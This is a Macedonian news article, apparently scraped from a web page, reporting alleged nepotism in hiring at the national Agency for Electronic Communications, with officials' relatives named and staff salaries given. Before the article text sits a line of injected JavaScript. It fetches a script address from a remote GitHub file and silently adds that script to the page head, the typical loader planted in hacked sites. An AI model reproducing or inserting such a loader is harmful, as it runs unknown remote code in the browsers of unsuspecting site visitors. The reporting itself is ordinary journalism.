;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Агенцијата за електронски комуникации (АЕК) е претворена во агенција за непотизам - Антропол
АктуелноЛокално

Агенцијата за електронски комуникации (АЕК) е претворена во агенција за непотизам

Радио Слободна Европа објави дека нововработен во Агенцијата за електронски комуникации е Ѓоко Бухов, син на директорката на Државниот здравствен инспекторат Иринка Сотирова Бухова, како помлад соработник за човечки ресурси. 

Таа за РСЕ одговори дека нејзиниот син е вработен во АЕК минатата година, откако конкурирал на оглас. Претходно конкурирал за работа во АД Водостопанство и приватната фирма Лука Мобил, но не бил примен. 

Од АЕК велат дека неговиот прв договор на определено време од една година бил склучен во април 2021, и годинава е продолжен на уште една година.

Меѓу 150-те вработени во ова регулаторно тело е и сопругата на министерот за надворешни Бујар Османи, Валбона Хаџи Османи ,која е вработена во АЕК како советник за меѓународна соработка пред четири години.

Покрај неа на списокот се и сопругите на поранешните генерални секретари на минатата влада Мартин Протуѓер и Кирил Божиновски, Христина Протоѓер и Кристина Божиновска. Едната како соработник за човечки ресурси, другата како раководител на сектор за регулатива.

Според овогодишниот буџет на Агенцијата, вкупно 1,8 милиони евра се предвидени за нето износ на плати, што значи дека во просек вработените во оваа агенција добиваат илјада евра плата.

според податоците на Годишниот извештај за работењето на Агенцијата за електронски комуникации за 2020 година, може да се заклучи дека вкупно 133 вработени во регулаторот на телекомуникациските компании, во просек земаат бруто плати од 1.463 евра.